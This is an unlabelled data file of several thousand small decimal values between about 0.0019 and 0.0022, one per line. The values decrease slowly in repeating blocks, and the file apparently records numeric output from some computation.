0.00218562
0.00218995
0.00218571
0.00218985
0.00218995
0.00218589
0.00217651
0.00218053
0.00218042
0.00217627
0.0021804
0.00217625
0.00217654
0.00217101
0.00216689
0.00217113
0.0021668
0.00216707
0.00217102
0.00217112
0.00217648
0.00218053
0.00218043
0.00217613
0.00218042
0.00217629
0.00217621
0.00217099
0.00217113
0.00216684
0.00216713
0.00216711
0.00217112
0.00217101
0.00217651
0.00218042
0.00218053
0.00217627
0.0021804
0.00217654
0.00217625
0.00217101
0.00216689
0.00217113
0.0021668
0.00217113
0.00217102
0.00216707
0.00217648
0.00218053
0.00218043
0.00217613
0.00218042
0.00217621
0.00217629
0.00217099
0.00217113
0.00216713
0.00216684
0.00217101
0.00217112
0.00216711
0.00218987
0.00218962
0.00218589
0.00218589
0.00218976
0.00218976
0.00218571
0.00217629
0.00217681
0.00218034
0.00218034
0.00217648
0.00218046
0.00217648
0.00218982
0.00218995
0.00218595
0.00218566
0.00218984
0.00218994
0.00218593
0.00219531
0.00219927
0.00219937
0.00219497
0.00219513
0.00219926
0.00219504
0.00219535
0.00219511
0.00219927
0.00219936
0.00219537
0.00219924
0.00219508
0.00218984
0.00218562
0.00218995
0.00218571
0.00218985
0.00218995
0.00218589
0.00217651
0.00218042
0.00218053
0.00217627
0.0021804
0.00217654
0.00217625
0.00217101
0.00216689
0.00217113
0.0021668
0.00216707
0.00217102
0.00217112
0.00217648
0.00218053
0.00218043
0.00217613
0.00218042
0.00217629
0.00217621
0.00217099
0.00217113
0.00216713
0.00216684
0.00216711
0.00217101
0.00217112
0.00217651
0.00218042
0.00218053
0.00217627
0.0021804
0.00217654
0.00217625
0.00217101
0.00216689
0.00217113
0.0021668
0.00217112
0.00217102
0.00216707
0.00217648
0.00218053
0.00218043
0.00217613
0.00218042
0.00217621
0.0021763
0.00217099
0.00217113
0.00216713
0.00216684
0.00217101
0.00217112
0.00216711
0.00217629
0.00217681
0.00218034
0.00218034
0.00218046
0.00217648
0.00217648
0.00215225
0.00215199
0.00214828
0.00214828
0.00214809
0.00215214
0.00215214
0.0021387
0.00213922
0.00214275
0.00214275
0.00214286
0.00213889
0.00213889
0.00215219
0.00215233
0.00214805
0.00214833
0.00215232
0.00215221
0.00214831
0.00215767
0.00216162
0.00216172
0.00215733
0.0021574
0.00216161
0.00215749
0.00215771
0.00215746
0.00216172
0.00216161
0.00215744
0.00216158
0.00215773
0.00215221
0.00214801
0.00215233
0.00214809
0.00215233
0.00215222
0.00214828
0.00215219
0.00215233
0.00214805
0.00214833
0.00215232
0.00215221
0.00214831
0.00215767
0.00216162
0.00216172
0.00215733
0.0021616
0.0021574
0.00215749
0.00215771
0.00215746
0.00216172
0.00216161
0.00216158
0.00215744
0.00215773
0.00215221
0.00214801
0.00215233
0.00214809
0.00215233
0.00214828
0.00215222
0.00213892
0.00214293
0.00214282
0.00213868
0.0021428
0.00213866
0.00213894
0.00213343
0.00212932
0.00213356
0.00212924
0.00213345
0.00213356
0.0021295
0.00213889
0.00214294
0.00214283
0.00213855
0.0021387
0.00214282
0.00213862
0.00213341
0.00213356
0.00212928
0.00212956
0.00213355
0.00213343
0.00212954
0.00213892
0.00214293
0.00214282
0.00213868
0.0021428
0.00213866
0.00213894
0.00213343
0.00212932
0.00213356
0.00212924
0.00213356
0.00213345
0.0021295
0.00213889
0.00214294
0.00214283
0.00213855
0.00214282
0.00213862
0.00213871
0.00213341
0.00213356
0.00212928
0.00212956
0.00213355
0.00213343
0.00212954
0.00215225
0.00215199
0.00214828
0.00214828
0.00215213
0.00215213
0.00214809
0.0021387
0.00213922
0.00214275
0.00214275
0.00213889
0.00214287
0.00213889
0.00215219
0.00215233
0.00214804
0.00214833
0.00215232
0.00215221
0.00214831
0.00215767
0.00216162
0.00216172
0.00215733
0.0021574
0.0021616
0.00215749
0.0021577
0.00215746
0.00216172
0.00216161
0.00215744
0.00216158
0.00215773
0.00215221
0.00214801
0.00215233
0.00214809
0.00215233
0.00215222
0.00214828
0.00215219
0.00215233
0.00214833
0.00214805
0.00215221
0.00215232
0.00214831
0.00215767
0.00216162
0.00216172
0.00215733
0.00216161
0.0021574
0.00215749
0.00215771
0.00215746
0.00216161
0.00216172
0.00216158
0.00215773
0.00215744
0.00215221
0.00214801
0.00215233
0.00214809
0.00215233
0.00214828
0.00215222
0.00213892
0.00214293
0.00214282
0.00213868
0.0021428
0.00213866
0.00213894
0.00213343
0.00212932
0.00213356
0.00212924
0.00213345
0.00213356
0.00212951
0.00213889
0.00214294
0.00214283
0.00213855
0.00213871
0.00214282
0.00213862
0.00213341
0.00213356
0.00212927
0.00212956
0.00213355
0.00213343
0.00212954
0.00213892
0.00214282
0.00214293
0.00213868
0.00214279
0.00213894
0.00213866
0.00213343
0.00212932
0.00213356
0.00212924
0.00213356
0.00213345
0.00212951
0.00213889
0.00214294
0.00214283
0.00213855
0.00214282
0.00213862
0.00213871
0.00213341
0.00213356
0.00212956
0.00212928
0.00213343
0.00213355
0.00212954
0.00215219
0.00215233
0.00214833
0.00214805
0.00215221
0.00215232
0.00214831
0.00215767
0.00216162
0.00216172
0.00215733
0.00215749
0.00216161
0.0021574
0.00215771
0.00215746
0.00216161
0.00216172
0.00215773
0.00216159
0.00215744
0.00215221
0.00214801
0.00215233
0.00214809
0.00215222
0.00215233
0.00214828
0.00213892
0.00214293
0.00214282
0.00213868
0.00214279
0.00213866
0.00213894
0.00213343
0.00212932
0.00213356
0.00212924
0.00212951
0.00213345
0.00213356
0.00213889
0.00214294
0.00214283
0.00213855
0.00214282
0.00213871
0.00213862
0.00213341
0.00213356
0.00212928
0.00212956
0.00212954
0.00213355
0.00213343
0.00213892
0.00214282
0.00214293
0.00213868
0.0021428
0.00213894
0.00213866
0.00213343
0.00212932
0.00213356
0.00212924
0.00213356
0.00213345
0.0021295
0.00213889
0.00214294
0.00214283
0.00213855
0.00214282
0.00213862
0.00213871
0.00213341
0.00213356
0.00212956
0.00212928
0.00213343
0.00213355
0.00212954
0.00215225
0.00215199
0.00214828
0.00214828
0.00215214
0.00215214
0.00214809
0.0021387
0.00213922
0.00214275
0.00214275
0.00213889
0.00214286
0.00213889
0.00215219
0.00215233
0.00214833
0.00214805
0.00215221
0.00215232
0.00214831
0.00215767
0.00216162
0.00216172
0.00215733
0.00215749
0.0021616
0.0021574
0.00215771
0.00215746
0.00216161
0.00216172
0.00215773
0.00216158
0.00215744
0.00215221
0.00214801
0.00215233
0.0021481
0.00215222
0.00215233
0.00214828
0.00213892
0.00214282
0.00214293
0.00213868
0.0021428
0.00213894
0.00213866
0.00213343
0.00212932
0.00213356
0.00212924
0.0021295
0.00213345
0.00213356
0.00213889
0.00214294
0.00214283
0.00213855
0.00214282
0.00213871
0.00213862
0.00213341
0.00213356
0.00212956
0.00212927
0.00212954
0.00213343
0.00213355
0.00213892
0.00214282
0.00214293
0.00213868
0.0021428
0.00213894
0.00213866
0.00213343
0.00212932
0.00213356
0.00212924
0.00213356
0.00213345
0.0021295
0.00213889
0.00214294
0.00214283
0.00213855
0.00214282
0.00213862
0.00213871
0.00213341
0.00213356
0.00212956
0.00212928
0.00213343
0.00213355
0.00212954
0.0021387
0.00213922
0.00214275
0.00214275
0.00214286
0.00213889
0.00213889
0.00211473
0.00211446
0.00211076
0.00211076
0.00211057
0.00211461
0.00211461
0.0021012
0.00210172
0.00210524
0.00210524
0.00210536
0.00210139
0.00210139
0.00211466
0.00211481
0.00211053
0.00211081
0.0021148
0.00211468
0.00211079
0.00212013
0.00212407
0.00212418
0.00211979
0.00211986
0.00212405
0.00211994
0.00212016
0.00211992
0.00212417
0.00212405
0.0021199
0.00212403
0.00212018
0.00211468
0.00211049
0.00211481
0.00211057
0.00211481
0.0021147
0.00211075
0.00211465
0.00211481
0.00211053
0.00211081
0.0021148
0.00211468
0.00211079
0.00212013
0.00212407
0.00212418
0.00211979
0.00212405
0.00211986
0.00211995
0.00212016
0.00211992
0.00212417
0.00212405
0.00212403
0.0021199
0.00212018
0.00211468
0.00211049
0.00211481
0.00211058
0.00211481
0.00211075
0.0021147
0.00210142
0.00210543
0.00210531
0.00210118
0.00210528
0.00210116
0.00210144
0.00209594
0.00209185
0.00209608
0.00209176
0.00209596
0.00209608
0.00209202
0.00210139
0.00210544
0.00210533
0.00210105
0.00210121
0.00210531
0.00210112
0.00209592
0.00209608
0.0020918
0.00209208
0.00209607
0.00209594
0.00209206
0.00210142
0.00210543
0.00210531
0.00210118
0.00210528
0.00210116
0.00210144
0.00209594
0.00209185
0.00209608
0.00209176
0.00209608
0.00209596
0.00209202
0.00210139
0.00210544
0.00210533
0.00210105
0.00210531
0.00210112
0.00210121
0.00209592
0.00209607
0.0020918
0.00209208
0.00209607
0.00209594
0.00209206
0.00211473
0.00211446
0.00211076
0.00211076
0.00211461
0.00211461
0.00211057
0.0021012
0.00210172
0.00210524
0.00210524
0.00210139
0.00210536
0.00210139
0.00211465
0.00211481
0.00211053
0.00211081
0.0021148
0.00211468
0.00211079
0.00212013
0.00212407
0.00212418
0.00211979
0.00211986
0.00212405
0.00211995
0.00212016
0.00211992
0.00212417
0.00212405
0.0021199
0.00212403
0.00212018
0.00211468
0.00211049
0.00211481
0.00211058
0.00211481
0.0021147
0.00211076
0.00211466
0.00211481
0.00211081
0.00211053
0.00211468
0.0021148
0.00211079
0.00212013
0.00212407
0.00212418
0.00211979
0.00212405
0.00211986
0.00211995
0.00212016
0.00211992
0.00212405
0.00212418
0.00212403
0.00212018
0.0021199
0.00211468
0.00211049
0.00211481
0.00211058
0.00211481
0.00211076
0.0021147
0.00210142
0.00210543
0.00210531
0.00210118
0.00210528
0.00210116
0.00210144
0.00209594
0.00209185
0.00209608
0.00209176
0.00209596
0.00209608
0.00209203
0.00210139
0.00210544
0.00210533
0.00210105
0.00210121
0.00210531
0.00210112
0.00209592
0.00209608
0.0020918
0.00209208
0.00209607
0.00209594
0.00209206
0.00210142
0.00210531
0.00210543
0.00210118
0.00210528
0.00210144
0.00210116
0.00209594
0.00209185
0.00209608
0.00209176
0.00209607
0.00209596
0.00209202
0.00210139
0.00210544
0.00210533
0.00210105
0.00210531
0.00210112
0.00210121
0.00209592
0.00209607
0.00209208
0.0020918
0.00209594
0.00209607
0.00209206
0.00211466
0.00211481
0.00211081
0.00211053
0.00211468
0.0021148
0.00211079
0.00212013
0.00212407
0.00212418
0.00211979
0.00211995
0.00212405
0.00211986
0.00212016
0.00211992
0.00212405
0.00212417
0.00212018
0.00212403
0.0021199
0.00211468
0.00211049
0.00211481
0.00211057
0.0021147
0.00211481
0.00211075
0.00210142
0.00210543
0.00210531
0.00210118
0.00210528
0.00210116
0.00210144
0.00209594
0.00209185
0.00209608
0.00209176
0.00209203
0.00209596
0.00209608
0.00210139
0.00210544
0.00210533
0.00210105
0.00210531
0.00210121
0.00210113
0.00209592
0.00209608
0.0020918
0.00209208
0.00209206
0.00209607
0.00209594
0.00210142
0.00210531
0.00210543
0.00210118
0.00210528
0.00210144
0.00210116
0.00209594
0.00209185
0.00209608
0.00209176
0.00209608
0.00209596
0.00209202
0.00210139
0.00210544
0.00210533
0.00210105
0.00210531
0.00210112
0.00210121
0.00209592
0.00209608
0.00209208
0.0020918
0.00209594
0.00209607
0.00209206
0.00211473
0.00211446
0.00211076
0.00211075
0.00211461
0.00211461
0.00211057
0.0021012
0.00210172
0.00210524
0.00210524
0.00210139
0.00210536
0.00210139
0.00211465
0.00211481
0.00211081
0.00211053
0.00211468
0.0021148
0.00211079
0.00212013
0.00212407
0.00212418
0.00211979
0.00211995
0.00212405
0.00211986
0.00212016
0.00211992
0.00212405
0.00212417
0.00212018
0.00212403
0.0021199
0.00211468
0.00211049
0.00211481
0.00211058
0.0021147
0.00211481
0.00211075
0.00210142
0.00210531
0.00210543
0.00210118
0.00210528
0.00210144
0.00210116
0.00209594
0.00209185
0.00209608
0.00209176
0.00209202
0.00209596
0.00209608
0.00210139
0.00210544
0.00210533
0.00210105
0.00210531
0.00210121
0.00210112
0.00209592
0.00209608
0.00209208
0.0020918
0.00209206
0.00209594
0.00209607
0.00210142
0.00210531
0.00210543
0.00210118
0.00210528
0.00210144
0.00210116
0.00209594
0.00209185
0.00209608
0.00209176
0.00209608
0.00209596
0.00209202
0.00210139
0.00210544
0.00210533
0.00210105
0.00210531
0.00210112
0.00210121
0.00209592
0.00209608
0.00209208
0.0020918
0.00209594
0.00209607
0.00209206
0.0021012
0.00210172
0.00210524
0.00210524
0.00210536
0.00210139
0.00210139
0.00207729
0.00207701
0.00207332
0.00207332
0.00207313
0.00207716
0.00207717
0.00206378
0.00206429
0.00206782
0.00206782
0.00206794
0.00206397
0.00206397
0.0020772
0.00207736
0.00207309
0.00207337
0.00207736
0.00207723
0.00207335
0.00208267
0.0020866
0.00208672
0.00208234
0.00208241
0.00208658
0.00208249
0.0020827
0.00208246
0.00208671
0.00208658
0.00208244
0.00208656
0.00208272
0.00207723
0.00207305
0.00207737
0.00207313
0.00207736
0.00207725
0.00207331
0.0020772
0.00207736
0.00207309
0.00207337
0.00207735
0.00207723
0.00207335
0.00208267
0.0020866
0.00208672
0.00208234
0.00208658
0.0020824
0.00208249
0.0020827
0.00208246
0.00208671
0.00208658
0.00208656
0.00208244
0.00208272
0.00207723
0.00207305
0.00207737
0.00207314
0.00207737
0.00207331
0.00207725
0.002064
0.00206801
0.00206787
0.00206376
0.00206785
0.00206374
0.00206402
0.00205853
0.00205444
0.00205868
0.00205436
0.00205855
0.00205867
0.00205462
0.00206396
0.00206802
0.0020679
0.00206364
0.00206378
0.00206788
0.0020637
0.0020585
0.00205867
0.00205439
0.00205467
0.00205866
0.00205853
0.00205465
0.002064
0.00206801
0.00206787
0.00206376
0.00206785
0.00206374
0.00206402
0.00205853
0.00205444
0.00205868
0.00205436
0.00205867
0.00205855
0.00205462
0.00206396
0.00206802
0.0020679
0.00206363
0.00206788
0.0020637
0.00206379
0.0020585
0.00205867
0.00205439
0.00205467
0.00205866
0.00205853
0.00205465
0.00207729
0.00207701
0.00207332
0.00207331
0.00207717
0.00207716
0.00207313
0.00206378
0.00206429
0.00206781
0.00206781
0.00206397
0.00206794
0.00206397
0.0020772
0.00207736
0.00207309
0.00207336
0.00207736
0.00207723
0.00207334
0.00208267
0.0020866
0.00208672
0.00208234
0.00208241
0.00208658
0.00208249
0.0020827
0.00208246
0.00208671
0.00208658
0.00208244
0.00208656
0.00208272
0.00207723
0.00207305
0.00207737
0.00207314
0.00207736
0.00207725
0.00207331
0.0020772
0.00207736
0.00207336
0.00207309
0.00207723
0.00207736
0.00207335
0.00208267
0.0020866
0.00208672
0.00208234
0.00208658
0.00208241
0.00208249
0.0020827
0.00208246
0.00208658
0.00208671
0.00208656
0.00208272
0.00208244
0.00207723
0.00207305
0.00207737
0.00207314
0.00207736
0.00207331
0.00207725
0.002064
0.00206801
0.00206787
0.00206376
0.00206785
0.00206374
0.00206402
0.00205853
0.00205444
0.00205868
0.00205436
0.00205855
0.00205867
0.00205462
0.00206396
0.00206801
0.0020679
0.00206364
0.00206379
0.00206788
0.0020637
0.0020585
0.00205867
0.00205439
0.00205467
0.00205866
0.00205853
0.00205465
0.002064
0.00206787
0.00206801
0.00206376
0.00206785
0.00206402
0.00206374
0.00205853
0.00205444
0.00205868
0.00205436
0.00205867
0.00205855
0.00205462
0.00206396
0.00206801
0.0020679
0.00206364
0.00206788
0.0020637
0.00206379
0.0020585
0.00205867
0.00205467
0.0020544
0.00205853
0.00205866
0.00205465
0.0020772
0.00207736
0.00207336
0.00207309
0.00207723
0.00207736
0.00207334
0.00208267
0.0020866
0.00208672
0.00208234
0.00208249
0.00208658
0.0020824
0.0020827
0.00208246
0.00208658
0.00208671
0.00208272
0.00208656
0.00208244
0.00207723
0.00207305
0.00207737
0.00207313
0.00207725
0.00207736
0.00207331
0.002064
0.00206801
0.00206787
0.00206376
0.00206785
0.00206374
0.00206401
0.00205853
0.00205444
0.00205868
0.00205436
0.00205462
0.00205855
0.00205867
0.00206396
0.00206801
0.0020679
0.00206364
0.00206788
0.00206379
0.0020637
0.0020585
0.00205867
0.0020544
0.00205467
0.00205465
0.00205866
0.00205853
0.002064
0.00206787
0.00206801
0.00206376
0.00206785
0.00206401
0.00206374
0.00205853
0.00205444
0.00205868
0.00205436
0.00205867
0.00205855
0.00205462
0.00206396
0.00206801
0.0020679
0.00206363
0.00206788
0.0020637
0.00206379
0.0020585
0.00205867
0.00205467
0.00205439
0.00205853
0.00205866
0.00205465
0.00207729
0.00207701
0.00207332
0.00207332
0.00207717
0.00207717
0.00207313
0.00206378
0.00206429
0.00206782
0.00206782
0.00206397
0.00206794
0.00206397
0.0020772
0.00207736
0.00207337
0.00207309
0.00207723
0.00207736
0.00207334
0.00208267
0.0020866
0.00208672
0.00208234
0.00208249
0.00208658
0.0020824
0.0020827
0.00208246
0.00208658
0.00208671
0.00208272
0.00208656
0.00208244
0.00207723
0.00207305
0.00207737
0.00207314
0.00207725
0.00207736
0.00207331
0.002064
0.00206787
0.00206801
0.00206376
0.00206785
0.00206401
0.00206374
0.00205853
0.00205444
0.00205868
0.00205436
0.00205462
0.00205856
0.00205867
0.00206396
0.00206802
0.0020679
0.00206364
0.00206788
0.00206379
0.0020637
0.0020585
0.00205867
0.00205467
0.00205439
0.00205465
0.00205853
0.00205866
0.002064
0.00206787
0.00206801
0.00206376
0.00206785
0.00206401
0.00206374
0.00205853
0.00205444
0.00205868
0.00205436
0.00205867
0.00205855
0.00205462
0.00206396
0.00206801
0.0020679
0.00206363
0.00206788
0.0020637
0.00206379
0.0020585
0.00205867
0.00205467
0.00205439
0.00205853
0.00205866
0.00205465
0.00206378
0.00206429
0.00206781
0.00206781
0.00206794
0.00206397
0.00206397
0.00203992
0.00203963
0.00203595
0.00203595
0.00203576
0.00203979
0.00203979
0.00202643
0.00202694
0.00203046
0.00203046
0.00203059
0.00202662
0.00202662
0.00203982
0.00203999
0.00203572
0.00203599
0.00203999
0.00203985
0.00203597
0.00204528
0.00204921
0.00204933
0.00204495
0.00204502
0.00204919
0.0020451
0.00204531
0.00204508
0.00204932
0.00204918
0.00204506
0.00204916
0.00204533
0.00203985
0.00203569
0.00204
0.00203577
0.00203999
0.00203988
0.00203594
0.00203982
0.00203999
0.00203572
0.00203599
0.00203999
0.00203985
0.00203598
0.00204528
0.00204921
0.00204933
0.00204495
0.00204919
0.00204502
0.0020451
0.00204531
0.00204508
0.00204932
0.00204918
0.00204916
0.00204506
0.00204533
0.00203985
0.00203569
0.00204
0.00203577
0.00203999
0.00203594
0.00203988
0.00202664
0.00203066
0.00203051
0.00202641
0.00203049
0.00202639
0.00202666
0.00202119
0.00201711
0.00202135
0.00201703
0.00202122
0.00202134
0.00201728
0.00202661
0.00203066
0.00203054
0.00202629
0.00202644
0.00203052
0.00202636
0.00202116
0.00202133
0.00201706
0.00201734
0.00202133
0.00202118
0.00201732
0.00202665
0.00203065
0.00203051
0.00202641
0.00203049
0.00202639
0.00202666
0.00202119
0.00201711
0.00202135
0.00201703
0.00202134
0.00202122
0.00201729
0.00202661
0.00203066
0.00203054
0.00202629
0.00203052
0.00202635
0.00202644
0.00202116
0.00202133
0.00201706
0.00201734
0.00202133
0.00202118
0.00201732
0.00203992
0.00203963
0.00203595
0.00203595
0.00203979
0.00203979
0.00203576
0.00202643
0.00202694
0.00203046
0.00203046
0.00202662
0.00203059
0.00202662
0.00203982
0.00203999
0.00203572
0.00203599
0.00203999
0.00203985
0.00203597
0.00204528
0.00204921
0.00204933
0.00204495
0.00204502
0.00204919
0.0020451
0.00204531
0.00204508
0.00204932
0.00204918
0.00204506
0.00204916
0.00204533
0.00203985
0.00203569
0.00204
0.00203577
0.00204
0.00203988
0.00203594
0.00203983
0.00203999
0.00203599
0.00203572
0.00203985
0.00203999
0.00203598
0.00204528
0.00204921
0.00204933
0.00204495
0.00204919
0.00204502
0.0020451
0.00204531
0.00204508
0.00204918
0.00204932
0.00204916
0.00204533
0.00204505
0.00203985
0.00203569
0.00204
0.00203577
0.00203999
0.00203594
0.00203988
0.00202664
0.00203065
0.00203051
0.00202641
0.00203049
0.00202639
0.00202666
0.00202119
0.00201711
0.00202134
0.00201703
0.00202122
0.00202134
0.00201729
0.00202661
0.00203067
0.00203054
0.00202629
0.00202644
0.00203052
0.00202636
0.00202116
0.00202133
0.00201706
0.00201734
0.00202133
0.00202118
0.00201732
0.00202665
0.00203051
0.00203066
0.00202641
0.00203049
0.00202666
0.00202639
0.00202119
0.00201711
0.00202134
0.00201703
0.00202134
0.00202122
0.00201729
0.00202661
0.00203066
0.00203054
0.00202629
0.00203052
0.00202636
0.00202644
0.00202116
0.00202133
0.00201734
0.00201707
0.00202118
0.00202133
0.00201732
0.00203982
0.00203999
0.00203599
0.00203572
0.00203985
0.00203998
0.00203597
0.00204528
0.00204921
0.00204933
0.00204495
0.0020451
0.00204919
0.00204502
0.00204531
0.00204508
0.00204918
0.00204932
0.00204533
0.00204916
0.00204505
0.00203985
0.00203568
0.00204
0.00203577
0.00203987
0.00203999
0.00203594
0.00202664
0.00203065
0.00203051
0.00202641
0.00203049
0.00202639
0.00202666
0.00202119
0.00201711
0.00202134
0.00201703
0.00201729
0.00202122
0.00202134
0.00202661
0.00203066
0.00203054
0.00202629
0.00203051
0.00202644
0.00202635
0.00202116
0.00202133
0.00201706
0.00201734
0.00201732
0.00202133
0.00202118
0.00202664
0.00203051
0.00203065
0.00202641
0.00203049
0.00202666
0.00202639
0.00202119
0.00201711
0.00202134
0.00201703
0.00202133
0.00202122
0.00201728
0.00202661
0.00203066
0.00203054
0.00202629
0.00203052
0.00202635
0.00202644
0.00202116
0.00202133
0.00201734
0.00201706
0.00202118
0.00202133
0.00201732
0.00203992
0.00203963
0.00203595
0.00203595
0.00203979
0.00203979
0.00203576
0.00202643
0.00202694
0.00203046
0.00203046
0.00202662
0.00203059
0.00202662
0.00203982
0.00203999
0.00203599
0.00203572
0.00203985
0.00203999
0.00203597
0.00204528
0.00204921
0.00204933
0.00204495
0.0020451
0.00204919
0.00204502
0.00204531
0.00204508
0.00204918
0.00204932
0.00204533
0.00204916
0.00204505
0.00203985
0.00203568
0.00204
0.00203577
0.00203988
0.00203999
0.00203594
0.00202664
0.00203051
0.00203065
0.00202641
0.00203049
0.00202666
0.00202639
0.00202119
0.00201711
0.00202135
0.00201703
0.00201729
0.00202122
0.00202133
0.00202661
0.00203066
0.00203054
0.00202629
0.00203052
0.00202644
0.00202636
0.00202116
0.00202133
0.00201734
0.00201706
0.00201732
0.00202118
0.00202133
0.00202664
0.00203051
0.00203065
0.00202641
0.00203049
0.00202666
0.00202639
0.00202119
0.00201711
0.00202134
0.00201703
0.00202134
0.00202122
0.00201728
0.00202661
0.00203066
0.00203054
0.00202629
0.00203052
0.00202635
0.00202644
0.00202116
0.00202133
0.00201734
0.00201706
0.00202118
0.00202133
0.00201732
0.00202643
0.00202694
0.00203046
0.00203046
0.00203059
0.00202661
0.00202661
0.00200263
0.00200233
0.00199866
0.00199866
0.00199848
0.0020025
0.0020025
0.00198917
0.00198967
0.00199319
0.00199319
0.00199332
0.00198935
0.00198935
0.00200252
0.0020027
0.00199843
0.0019987
0.00200269
0.00200254
0.00199868
0.00200797
0.00201189
0.00201202
0.00200765
0.00200771
0.00201187
0.00200779
0.002008
0.00200777
0.00201201
0.00201186
0.00200775
0.00201184
0.00200802
0.00200255
0.0019984
0.00200271
0.00199848
0.0020027
0.00200258
0.00199865
0.00200252
0.0020027
0.00199843
0.0019987
0.00200269
0.00200254
0.00199868
0.00200797
0.00201189
0.00201202
0.00200765
0.00201187
0.00200771
0.00200779
0.002008
0.00200777
0.00201201
0.00201186
0.00201184
0.00200775
0.00200802
0.00200255
0.0019984
0.00200271
0.00199848
0.0020027
0.00199865
0.00200258
0.00198938
0.00199338
0.00199323
0.00198915
0.00199321
0.00198913
0.00198939
0.00198394
0.00197987
0.0019841
0.00197979
0.00198397
0.00198409
0.00198004
0.00198935
0.00199339
0.00199327
0.00198903
0.00198917
0.00199324
0.00198909
0.00198391
0.00198409
0.00197982
0.00198009
0.00198408
0.00198393
0.00198007
0.00198938
0.00199339
0.00199323
0.00198914
0.00199321
0.00198913
0.00198939
0.00198393
0.00197987
0.0019841
0.00197979
0.00198409
0.00198397
0.00198004
0.00198934
0.00199339
0.00199327
0.00198903
0.00199324
0.00198909
0.00198917
0.0019839
0.00198408
0.00197982
0.00198009
0.00198408
0.00198393
0.00198007
0.00200263
0.00200233
0.00199866
0.00199866
0.0020025
0.0020025
0.00199847
0.00198917
0.00198967
0.00199319
0.00199318
0.00198935
0.00199332
0.00198935
0.00200252
0.0020027
0.00199843
0.0019987
0.00200269
0.00200254
0.00199868
0.00200797
0.00201189
0.00201202
0.00200765
0.00200771
0.00201187
0.00200779
0.002008
0.00200777
0.00201201
0.00201186
0.00200774
0.00201184
0.00200802
0.00200255
0.0019984
0.00200271
0.00199848
0.0020027
0.00200258
0.00199865
0.00200252
0.0020027
0.0019987
0.00199843
0.00200254
0.00200269
0.00199868
0.00200797
0.00201189
0.00201202
0.00200765
0.00201187
0.00200771
0.00200779
0.002008
0.00200777
0.00201186
0.00201201
0.00201184
0.00200802
0.00200775
0.00200255
0.0019984
0.00200271
0.00199848
0.0020027
0.00199865
0.00200258
0.00198938
0.00199338
0.00199323
0.00198914
0.00199321
0.00198913
0.00198939
0.00198394
0.00197987
0.0019841
0.00197979
0.00198397
0.00198409
0.00198004
0.00198935
0.00199339
0.00199327
0.00198903
0.00198917
0.00199324
0.00198909
0.00198391
0.00198408
0.00197983
0.00198009
0.00198408
0.00198393
0.00198007
0.00198938
0.00199323
0.00199338
0.00198914
0.00199321
0.00198939
0.00198912
0.00198393
0.00197987
0.0019841
0.00197979
0.00198409
0.00198397
0.00198004
0.00198934
0.00199339
0.00199327
0.00198903
0.00199324
0.00198909
0.00198917
0.00198391
0.00198408
0.00198009
0.00197982
0.00198393
0.00198408
0.00198007
0.00200252
0.0020027
0.0019987
0.00199843
0.00200254
0.00200269
0.00199868
0.00200796
0.00201189
0.00201201
0.00200764
0.00200779
0.00201186
0.00200771
0.002008
0.00200776
0.00201186
0.00201201
0.00200801
0.00201184
0.00200774
0.00200255
0.0019984
0.00200271
0.00199848
0.00200258
0.0020027
0.00199865
0.00198937
0.00199338
0.00199323
0.00198914
0.00199321
0.00198912
0.00198939
0.00198393
0.00197987
0.0019841
0.00197979
0.00198004
0.00198397
0.00198409
0.00198934
0.00199339
0.00199327
0.00198903
0.00199324
0.00198917
0.00198909
0.0019839
0.00198409
0.00197982
0.00198009
0.00198007
0.00198408
0.00198393
0.00198937
0.00199323
0.00199338
0.00198914
0.00199321
0.00198939
0.00198912
0.00198393
0.00197987
0.0019841
0.00197979
0.00198409
0.00198396
0.00198004
0.00198934
0.00199339
0.00199327
0.00198902
0.00199324
0.00198909
0.00198917
0.0019839
0.00198408
0.00198009
0.00197982
0.00198393
0.00198408
0.00198007
0.00200263
0.00200233
0.00199866
0.00199866
0.0020025
0.0020025
0.00199848
0.00198917
0.00198967
0.00199319
0.00199319
0.00198935
0.00199332
0.00198935
0.00200252
0.0020027
0.0019987
0.00199843
0.00200254
0.00200269
0.00199868
0.00200797
0.00201189
0.00201202
0.00200765
0.00200779
0.00201187
0.00200771
0.002008
0.00200776
0.00201186
0.00201201
0.00200802
0.00201184
0.00200774
0.00200255
0.0019984
0.00200271
0.00199848
0.00200258
0.0020027
0.00199865
0.00198937
0.00199323
0.00199338
0.00198914
0.00199321
0.00198939
0.00198913
0.00198394
0.00197987
0.0019841
0.00197979
0.00198004
0.00198397
0.00198409
0.00198935
0.00199339
0.00199327
0.00198903
0.00199324
0.00198917
0.00198909
0.00198391
0.00198408
0.00198009
0.00197982
0.00198007
0.00198393
0.00198408
0.00198937
0.00199323
0.00199338
0.00198914
0.00199321
0.00198939
0.00198912
0.00198393
0.00197987
0.0019841
0.00197979
0.00198409
0.00198397
0.00198004
0.00198934
0.00199339
0.00199327
0.00198903
0.00199324
0.00198909
0.00198917
0.0019839
0.00198408
0.00198009
0.00197982
0.00198393
0.00198408
0.00198007
0.00198917
0.00198967
0.00199319
0.00199319
0.00199332
0.00198935
0.00198935
0.00196544
0.00196512
0.00196147
0.00196147
0.00196129
0.0019653
0.0019653
0.00195201
0.00195251
0.00195602
0.00195602
0.00195616
0.00195219
0.00195219
0.00196532
0.0019655
0.00196125
0.00196151
0.0019655
0.00196534
0.00196149
0.00197075
0.00197467
0.0019748
0.00197044
0.0019705
0.00197464
0.00197058
0.00197078
0.00197055
0.00197478
0.00197463
0.00197053
0.00197461
0.0019708
0.00196535
0.00196121
0.00196552
0.00196129
0.00196551
0.00196538
0.00196146
0.00196532
0.0019655
0.00196125
0.00196151
0.0019655
0.00196534
0.00196149
0.00197075
0.00197467
0.00197479
0.00197044
0.00197464
0.0019705
0.00197058
0.00197078
0.00197055
0.00197478
0.00197462
0.00197461
0.00197053
0.0019708
0.00196535
0.00196121
0.00196552
0.00196129
0.00196551
0.00196146
0.00196538
0.00195222
0.00195622
0.00195605
0.00195199
0.00195604
0.00195197
0.00195223
0.00194679
0.00194275
0.00194697
0.00194267
0.00194683
0.00194696
0.00194291
0.00195219
0.00195623
0.0019561
0.00195188
0.00195202
0.00195607
0.00195194
0.00194676
0.00194695
0.0019427
0.00194296
0.00194695
0.00194678
0.00194295
0.00195222
0.00195622
0.00195605
0.00195199
0.00195603
0.00195197
0.00195223
0.00194679
0.00194275
0.00194697
0.00194267
0.00194696
0.00194683
0.00194291
0.00195218
0.00195623
0.0019561
0.00195188
0.00195607
0.00195194
0.00195202
0.00194676
0.00194695
0.0019427
0.00194296
0.00194695
0.00194678
0.00194295
0.00196543
0.00196512
0.00196147
0.00196147
0.0019653
